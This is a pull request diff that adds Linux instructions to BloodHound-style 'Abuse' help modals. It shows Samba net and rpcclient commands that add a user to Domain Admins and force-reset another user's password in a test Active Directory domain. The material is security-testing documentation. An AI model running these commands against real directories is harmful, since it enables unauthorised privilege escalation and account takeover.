### PR TITLE
Added Linux Abuse Information

### DIFF
--- a/src/components/Modals/HelpTexts/AddMember/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/Abuse.jsx
@@ -62,6 +62,15 @@ const Abuse = ({ sourceName, sourceType }) => {
             <pre>
                 <code>{"Get-DomainGroupMember -Identity 'Domain Admins'"}</code>
             </pre>
+                    <p>
+                        You can also abuse this without using Windows-based
+                        tooling if you are operating from a Linux host.
+                        The net from the Samba toolset will let you add a
+                        user to the vulnerable group.
+                    </p>
+            <pre>
+                <code>{"net rpc group addmem 'Domain Admins' 'harmj0y' -U 'TESTLAB\\dfm.a' -S dc.testlab.local"}</code>
+            </pre>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx
@@ -65,6 +65,26 @@ const Abuse = ({ sourceName, sourceType }) => {
                 or perhaps even RDP to a system the target user has access to.
                 For more ideas and information, see the references tab.
             </p>
+            <p>
+                        You can also abuse this without using Windows-based
+                        tooling if you are operating from a Linux host.
+                        The net and rpcclient utilities from the Samba
+                        toolset will let you forcefully change a users password.
+                        The following command will leverage net to reset the password.
+            </p>
+            <pre>
+                <code>{"net rpc password 'harmj0y' -U 'TESTLAB\\dfm.a' -S dc.testlab.local\n"}
+                </code>
+            </pre>
+            <p>
+                        The following commands will leverage rpcclient to reset
+                        the password.
+            </p>
+            <pre>
+                <code>{"rpcclient -U 'TESTLAB\\dfm.a' dc.testlab.local\n"+
+                "rpcclient $> setuserinfo2 harmj0y 23 Password123!"}
+                </code>
+            </pre>
         </>
     );
 };


### PR DESCRIPTION
Added Linux Abuse information with the Net and RPCClient command from the Samba toolset. This updated the "AddMember" and the "ForceChangePassword" Abuse information modal to include the new additions. This also includes updates to the documentation.
![image](https://user-images.githubusercontent.com/44957111/233820593-701895d7-e34a-4e8e-b5db-c23d5cac48e1.png)

![image](https://user-images.githubusercontent.com/44957111/233820609-dadaa57a-3b81-4dc1-bacf-a79baa7279b1.png)
